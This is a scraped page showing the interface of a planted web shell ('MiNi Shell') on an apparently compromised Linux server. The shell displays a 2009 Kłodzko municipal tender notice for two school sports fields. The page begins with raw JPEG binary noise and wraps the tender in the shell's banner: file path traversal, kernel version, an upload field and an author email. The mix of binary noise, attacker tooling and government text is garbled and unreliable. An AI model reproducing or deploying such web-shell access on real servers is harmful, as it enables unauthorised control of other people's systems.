JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090602/85241-N-2009.html

<p class="kh_header"><b>Kłodzko: Budowa boisk wielofunkcyjnych</b><br>
<b>Numer ogłoszenia: 85241 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kłodzko , pl. Bolesława Chrobrego 1, 57-300 Kłodzko, woj. dolnośląskie, tel. 074/8654600, faks 074 8674062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.klodzko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boisk wielofunkcyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I zadania: 
Budowa boiska wielofunkcyjnego przy Gimnazjum nr 1 im. A. Mickiewicza w Kłodzku:   
1.  Główny przedmiot zamówienia CPV: 45212221 - 1 
 Przedmiotem zamówienia jest I etap budowy wielofunkcyjnego boiska sportowego przy Gimnazjum nr 1 im. Adama Mickiewicza, ul. Zawiszy Czarnego 5 w Kłodzku.  Bezpośrednim celem zamierzenia projektowego jest budowa całorocznego, wielofunkcyjnego boiska  sportowego o sztucznej nawierzchni poliuretanowo - kauczukowej składającego się z boiska do koszykówki o wymiarach 26m x 15m i boiska do piłki siatkowej o wymiarach 24m x 15m. 
Przygotowanie terenu:
-	pomiary geodezyjne
-	oczyszczenie i wyrównanie istniejącego boiska asfaltowego
Montaż nawierzchni:
-	wykonanie metodą natryskową przepuszczalnej nawierzchni poliuretanowo - kauczukowej o parametrach: 
-	przygotowanie mocowania pod wyposażenie boiska tj. pod dwa słupki do piłki siatkowej, koszykówki oraz badbinktona
Budowa ścianki ogrodzeniowej:
-	Na terenie działki po obu stronach za tylną krawędzią boiska projektuje się ściankę ogrodzeniową wysokości 3,0m. z siatki stalowej ocynkowanej o oczkach max. 60x60cm rozpiętej na lince min. Ř 4mm pomiędzy słupkami z  rur stalowych 
Ř 70x5mm pomalowanymi farbą do metalu. Pod słupki planuje się wykonanie fundamentów z betonu żwirowego B - 20 o szerokości 40cm i głębokości 120 cm.
Wyposażenie boiska:
-	komplet słupków do piłki siatkowej z siatką 
Wymagania techniczne, jakościowe i użytkowe stawiane przedmiotowi zamówienia.
Celem potwierdzenia spełniania przez oferowaną nawierzchnię poliuretanowo - kauczukową wymagań zamawiającego należy do oferty dołączyć następujące dokumenty:
-	ważną pełną wersję aprobaty technicznej ITB lub rekomendacji technicznej ITB zawierającej parametry nawierzchni lub kartę techniczną nawierzchni,
-	atest higieniczny PZH,
-	autoryzacje producenta oferowanej nawierzchni sportowej, która powinna być wydana specjalnie na zadanie objęte przetargiem i zawierać potwierdzenie dostarczenia przez producenta wszelkich niezbędnych materiałów do wykonania konkretnego rodzaju nawierzchni sportowych.
/parametry nawierzchni zawarte są w specyfikacji technicznej wykonania i odbioru robót/
Przedmiot zamówienia szczegółowo opisuje projekt budowlany oraz specyfikacja techniczna wykonania i odbioru robót.
Wykonawca jest zobowiązany do ustalenia z Zamawiającym zakresu robót (harmonogram rzeczowo - finansowy) do wykonania przedmiotu zamówienia.
2. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
3. Opis przedmiotu zamówienia zawarty jest w: projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót (Załącznik 5).

Część II zadania: 
Budowa boiska wielofunkcyjnego przy Zespole Szkół Integracyjnych w Kłodzku:   
1. Główny przedmiot zamówienia CPV: 45212221 - 1 
Przedmiotem zamówienia jest I etap budowy wielofunkcyjnego boiska sportowego przy Zespole Szkół Integracyjnych w Kłodzku. Bezpośrednim celem zamierzenia projektowego jest budowa całorocznego, wielofunkcyjnego boiska sportowego o sztucznej nawierzchni poliuretanowo - kauczukowej o wymiarach 40 x 24m. Projektuje się wykonanie metodą natryskową przepuszczalnej nawierzchni poliuretanowo - kauczukowej na podbudowie asfaltowej. 
Przygotowanie terenu:
-	pomiary geodezyjne
-	oczyszczenie i wyrównanie istniejącego boiska
Montaż nawierzchni:
-	wykonanie metodą natryskową przepuszczalnej nawierzchni poliuretanowo - kauczukowej
-	przygotowanie mocowania pod wyposażenie boiska tj. pod dwa słupki do piłki siatkowej, koszykówki oraz badbinktona
Wyposażenie boiska:
-	komplet słupków do piłki siatkowej z siatką
Wymagania techniczne, jakościowe i użytkowe stawiane przedmiotowi zamówienia.
Celem potwierdzenia spełniania przez oferowaną nawierzchnię poliuretanowo - kauczukową wymagań zamawiającego należy do oferty dołączyć następujące dokumenty:
-	ważną pełną wersję aprobaty technicznej ITB lub rekomendacji technicznej ITB zawierającej parametry nawierzchni lub kartę techniczną nawierzchni,
-	atest higieniczny PZH,
-	autoryzacje producenta oferowanej nawierzchni sportowej, która powinna być wydana specjalnie na zadanie objęte przetargiem i zawierać potwierdzenie dostarczenia przez producenta wszelkich niezbędnych materiałów do wykonania konkretnego rodzaju nawierzchni sportowych
/parametry nawierzchni zawarte są w specyfikacji technicznej wykonania i odbioru robót/

Przedmiot zamówienia szczegółowo opisuje projekt budowlany oraz specyfikacja techniczna wykonania i odbioru robót.
Wykonawca jest zobowiązany do ustalenia z Zamawiającym zakresu robót (harmonogram rzeczowo - finansowy) do wykonania przedmiotu zamówienia.

2. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
3. Opis przedmiotu zamówienia zawarty jest w: projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót (Załącznik 6)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1	O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną i odpowiednią ofertę oraz:
-posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia
-znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
-nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP, oraz:
2.  wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane stanowiące przedmiot zamówienia /roboty związane z budową boisk sportowych/ - min 1 robota na kwotę min. 100 000 PLN/brutto, należy przedstawić wykaz     z podaniem ich wartości, przedmiotu, dat i miejsca wykonania, oraz załączenie dokumentów potwierdzających, że te roboty zostały wykonane należycie. 
3.  dysponują osobą na stanowisko kierownika budowy posiadającą stosowne uprawnienia    do  kierowania robotami budowlanymi. Kserokopie uprawnień i przynależności do izby należy dołączyć do oferty. 
4. oświadczą, że spełniają warunki określone w art. 22 PZP oraz że nie podlegają wykluczeniu z postępowania na podstawie art. 24 PZP,
5	zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2  ust. 2 pkt. 1, 5, 6 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich 
te dokumenty mogą być składane. (Dz. U. Nr 87 z dnia 24 maja 2006r. poz. 605 ze zm). 


 Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu.

Komisja przetargowa, powołana przez zamawiającego, dokona oceny spełnienia            warunków udziału w postępowaniu, na podstawie dokumentów i oświadczeń złożonych  w ofercie, potwierdzających spełnienie wymaganych warunków wg zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1	Wypełniony i podpisany formularz oferty, formularz cenowy,(załącznik nr 1).
2	Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych  (załącznik nr 2).
3	Dokumenty zgodne z art. 26 ust. 2 PZP i wyszczególnione w § 1 ust. 1 pkt. 2,  ust. 2 pkt. 1, 5, 6 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału                       w postępowaniu o udzielenie zamówienia publicznego jakich może żądać zamawiający od wykonawcy (Dz. U. Nr 87, poz. 605 ze zm):
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składaniu ofert.
b)	wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia /min 1 robota  o wartości min. 100 000 PLN/brutto/, z podaniem ich wartości, daty i miejsca wykonania, oraz załączenia dokumentów potwierdzających, że  roboty te zostały wykonane należycie - referencje bądź protokoły odbioru ( załącznik nr 4);
c)	wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć  w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  (załącznik nr 3). 
d)	Dokumenty stwierdzające, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia.
4	Zaakceptowany projekt umowy.
5	Do oferty należy dołączyć jako załącznik kosztorys ofertowy. Kosztorys ten nie będzie podlegał ocenie na etapie wyboru Wykonawcy, ma on wyłącznie charakter poglądowy.
6	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty, o których mowa w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006 roku (Dz. U. z 2006 r. Nr 87 poz. 605 ) oraz zmiany wprowadzone rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. nr 188, poz.1155)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.klodzko.pl /gospodarka/ zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Kłodzku ; pl. B. Chrobrego 1;   57-300 Kłodzko, pok. 226.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2009 godzina 10:00, miejsce: Urząd Miasta w Kłodzku ; pl. B. Chrobrego 1;   57-300 Kłodzko, pok. 101 - Biuro Obsługi Ludności.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I etap budowy boiska wielofunkcyjnego przy Gimnazjum nr 1
im. Adama Mickiewicza w Kłodzku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I zadania: 
Budowa boiska wielofunkcyjnego przy Gimnazjum nr 1 im. A. Mickiewicza w Kłodzku:   
1.  Główny przedmiot zamówienia CPV: 45212221 - 1 
 Przedmiotem zamówienia jest I etap budowy wielofunkcyjnego boiska sportowego przy Gimnazjum nr 1 im. Adama Mickiewicza, ul. Zawiszy Czarnego 5 w Kłodzku.  Bezpośrednim celem zamierzenia projektowego jest budowa całorocznego, wielofunkcyjnego boiska  sportowego o sztucznej nawierzchni poliuretanowo - kauczukowej składającego się z boiska do koszykówki o wymiarach 26m x 15m i boiska do piłki siatkowej o wymiarach 24m x 15m. 
Przygotowanie terenu:
-	pomiary geodezyjne
-	oczyszczenie i wyrównanie istniejącego boiska asfaltowego
Montaż nawierzchni:
-	wykonanie metodą natryskową przepuszczalnej nawierzchni poliuretanowo - kauczukowej o parametrach: 
-	przygotowanie mocowania pod wyposażenie boiska tj. pod dwa słupki do piłki siatkowej, koszykówki oraz badbinktona
Budowa ścianki ogrodzeniowej:
-	Na terenie działki po obu stronach za tylną krawędzią boiska projektuje się ściankę ogrodzeniową wysokości 3,0m. z siatki stalowej ocynkowanej o oczkach max. 60x60cm rozpiętej na lince min. Ř 4mm pomiędzy słupkami z  rur stalowych 
Ř 70x5mm pomalowanymi farbą do metalu. Pod słupki planuje się wykonanie fundamentów z betonu żwirowego B - 20 o szerokości 40cm i głębokości 120 cm.
Wyposażenie boiska:
-	komplet słupków do piłki siatkowej z siatką 
Wymagania techniczne, jakościowe i użytkowe stawiane przedmiotowi zamówienia.
Celem potwierdzenia spełniania przez oferowaną nawierzchnię poliuretanowo - kauczukową wymagań zamawiającego należy do oferty dołączyć następujące dokumenty:
-	ważną pełną wersję aprobaty technicznej ITB lub rekomendacji technicznej ITB zawierającej parametry nawierzchni lub kartę techniczną nawierzchni,
-	atest higieniczny PZH,
-	autoryzacje producenta oferowanej nawierzchni sportowej, która powinna być wydana specjalnie na zadanie objęte przetargiem i zawierać potwierdzenie dostarczenia przez producenta wszelkich niezbędnych materiałów do wykonania konkretnego rodzaju nawierzchni sportowych.
/parametry nawierzchni zawarte są w specyfikacji technicznej wykonania i odbioru robót/
Przedmiot zamówienia szczegółowo opisuje projekt budowlany oraz specyfikacja techniczna wykonania i odbioru robót.
Wykonawca jest zobowiązany do ustalenia z Zamawiającym zakresu robót (harmonogram rzeczowo - finansowy) do wykonania przedmiotu zamówienia.
2. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
3. Opis przedmiotu zamówienia zawarty jest w: projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót (Załącznik 5)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> I etap budowy boiska wielofunkcyjnego przy Zespole Szkół Integracyjnych w Kłodzku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa boiska wielofunkcyjnego przy Zespole Szkół Integracyjnych w Kłodzku:   
1. Główny przedmiot zamówienia CPV: 45212221 - 1 
Przedmiotem zamówienia jest I etap budowy wielofunkcyjnego boiska sportowego przy Zespole Szkół Integracyjnych w Kłodzku. Bezpośrednim celem zamierzenia projektowego jest budowa całorocznego, wielofunkcyjnego boiska sportowego o sztucznej nawierzchni poliuretanowo - kauczukowej o wymiarach 40 x 24m. Projektuje się wykonanie metodą natryskową przepuszczalnej nawierzchni poliuretanowo - kauczukowej na podbudowie asfaltowej. 
Przygotowanie terenu:
-	pomiary geodezyjne
-	oczyszczenie i wyrównanie istniejącego boiska
Montaż nawierzchni:
-	wykonanie metodą natryskową przepuszczalnej nawierzchni poliuretanowo - kauczukowej
-	przygotowanie mocowania pod wyposażenie boiska tj. pod dwa słupki do piłki siatkowej, koszykówki oraz badbinktona
Wyposażenie boiska:
-	komplet słupków do piłki siatkowej z siatką
Wymagania techniczne, jakościowe i użytkowe stawiane przedmiotowi zamówienia.
Celem potwierdzenia spełniania przez oferowaną nawierzchnię poliuretanowo - kauczukową wymagań zamawiającego należy do oferty dołączyć następujące dokumenty:
-	ważną pełną wersję aprobaty technicznej ITB lub rekomendacji technicznej ITB zawierającej parametry nawierzchni lub kartę techniczną nawierzchni,
-	atest higieniczny PZH,
-	autoryzacje producenta oferowanej nawierzchni sportowej, która powinna być wydana specjalnie na zadanie objęte przetargiem i zawierać potwierdzenie dostarczenia przez producenta wszelkich niezbędnych materiałów do wykonania konkretnego rodzaju nawierzchni sportowych
/parametry nawierzchni zawarte są w specyfikacji technicznej wykonania i odbioru robót/

Przedmiot zamówienia szczegółowo opisuje projekt budowlany oraz specyfikacja techniczna wykonania i odbioru robót.
Wykonawca jest zobowiązany do ustalenia z Zamawiającym zakresu robót (harmonogram rzeczowo - finansowy) do wykonania przedmiotu zamówienia.

2. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
3. Opis przedmiotu zamówienia zawarty jest w: projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót (Załącznik 6)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com